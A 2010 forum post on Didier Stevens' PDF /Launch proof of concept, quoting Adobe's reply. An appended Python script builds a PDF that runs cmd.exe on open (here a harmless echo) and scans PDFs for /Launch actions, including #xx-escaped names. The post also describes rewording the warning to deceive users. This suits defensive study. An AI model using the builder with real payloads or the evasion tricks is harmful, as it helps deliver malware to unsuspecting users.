Posted by: Samker
« on: 01. April 2010., 19:15:27 »
The only thing blocking a PDF file written by security researcher Didier Stevens from harming your system is a warning dialog: http://blog.didierstevens.com/2010/03/29/escape-from-pdf/
With some slight tweaking of the warning, and some crafty social engineering, your system is a sitting duck for whatever program is embedded in that PDF.
"With Adobe Reader, the only thing preventing execution is a warning. Disabling JavaScript will not prevent this (I don’t use JavaScript in my PoC PDF), and patching Adobe Reader isn’t possible (I’m not exploiting a vulnerability, just being creative with the PDF language specs)."
The culprit here is simply an alternative way of launching commands from a PDF: the /Launch action type defined in the PDF specification. With some further technique applied to surreptitiously embed the executable (Stevens understandably doesn't go into detail about this part), the PDF is able to launch any program its creator embeds as long as the user clicks OK at the warning. Since the text of the warning can be influenced with some more clever hacking, this isn't a very big hurdle to overcome: simply turn the warning into an encouraging message convincing the user to open the file, and you're in. Foxit PDF Reader doesn't even display the warning message, making this threat even worse.
Adobe responded to the issue, according to Threatpost, by saying:
"Didier Stevens’ demo relies on functionality defined in the PDF specification, which is an ISO standard (ISO PDF 32000-1:2008). Section 12.6.4.5 of the specification defines the /launch command. This is an example of powerful functionality relied on by some users that also carries potential risks when used incorrectly. The warning message provided in Adobe Reader and Adobe Acrobat includes strong wording advising users to only open and execute the file if it comes from a trusted source. Adobe takes the security of our products and technologies very seriously; we are always evaluating ways to allow end-users and administrators to better manage and configure features like this one to mitigate potential associated risks."
(NW)
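The mechanism discussed above, as an added example that is not part of the original post, of Stevens' PoC or of any vendor code: a Python script that builds a minimal PDF whose /OpenAction is a /Launch action (the program and parameters here are a harmless echo, chosen for illustration), and a scanner that looks for /Launch actions in a PDF, including ones hidden behind the #xx name-escape syntax the PDF language allows (/L#61unch). Function names, the echo command and the constructed PDFs are assumptions of this example.

```python
import re

def _pdf_string(s: str) -> bytes:
    """Escape a Python string for use as a PDF literal string (...)."""
    return (s.encode("latin-1")
             .replace(b"\\", b"\\\\")
             .replace(b"(", b"\\(")
             .replace(b")", b"\\)"))

def build_launch_pdf(program: str, params: str) -> bytes:
    """Build a one-page PDF whose /OpenAction is a /Launch action.

    No JavaScript and no exploited bug: only the Launch action from ISO 32000-1
    section 12.6.4.5.  /Win /F is the file to run, /Win /P its parameters.
    The command passed by the caller is a harmless echo in this example.
    """
    objects = [
        b"<< /Type /Catalog /Pages 2 0 R /OpenAction 4 0 R >>",
        b"<< /Type /Pages /Kids [3 0 R] /Count 1 >>",
        b"<< /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >>",
        b"<< /Type /Action /S /Launch /Win << /F (%s) /P (%s) >> >>"
        % (_pdf_string(program), _pdf_string(params)),
    ]
    out = bytearray(b"%PDF-1.4\n")
    offsets = []
    for num, body in enumerate(objects, start=1):
        offsets.append(len(out))            # xref needs each object's byte offset
        out += b"%d 0 obj\n%s\nendobj\n" % (num, body)
    xref_pos = len(out)
    out += b"xref\n0 %d\n" % (len(objects) + 1)
    out += b"0000000000 65535 f \n"        # each xref entry is exactly 20 bytes
    for off in offsets:
        out += b"%010d 00000 n \n" % off
    out += (b"trailer\n<< /Size %d /Root 1 0 R >>\nstartxref\n%d\n%%%%EOF\n"
            % (len(objects) + 1, xref_pos))
    return bytes(out)

# A PDF name may spell any byte as #xx, so /Launch can be written /L#61unch.
_NAME = re.compile(rb"/(?:[^\s/\[\]<>(){}%#]|#[0-9A-Fa-f]{2})+")
_ESC = re.compile(rb"#([0-9A-Fa-f]{2})")
_LAUNCH = re.compile(rb"/S\s*/Launch\b")
_FIELD = re.compile(rb"/(F|P)\s*\((.*?)(?<!\\)\)", re.S)

def _normalize_names(data: bytes) -> bytes:
    """Decode #xx escapes inside every PDF name so obfuscated keys still match.
    Caveat: a '/x#41' sequence inside a literal string is decoded too."""
    return _NAME.sub(lambda m: _ESC.sub(
        lambda e: bytes([int(e.group(1), 16)]), m.group(0)), data)

def find_launch_actions(pdf: bytes) -> list:
    """Return one dict per /Launch action found, with its /F and /P strings.

    Only uncompressed objects are inspected; actions inside FlateDecode object
    streams need to be inflated first (a pdf-parser style tool does that).
    """
    data = _normalize_names(pdf)
    hits = []
    for m in _LAUNCH.finditer(data):
        # The /F and /P strings live in the same action dictionary, so a
        # bounded window after /S /Launch is enough to pull them out.
        window = data[m.start(): m.start() + 512]
        fields = {k.decode(): v.decode("latin-1") for k, v in _FIELD.findall(window)}
        hits.append({"file": fields.get("F"), "params": fields.get("P")})
    return hits

if __name__ == "__main__":
    sample = build_launch_pdf("cmd.exe", "/c echo launched from a PDF")
    for hit in find_launch_actions(sample):
        print("Launch action:", hit)
    obfuscated = sample.replace(b"/Launch", b"/L#61unch")
    print("Obfuscated copy still detected:", bool(find_launch_actions(obfuscated)))
```

The scanner deliberately matches the normalized name rather than the literal bytes `/Launch`, because a signature on the literal spelling is bypassed by the #xx escape form; anything the page says about disabling JavaScript is irrelevant here, since no JavaScript object is present in the generated file at all.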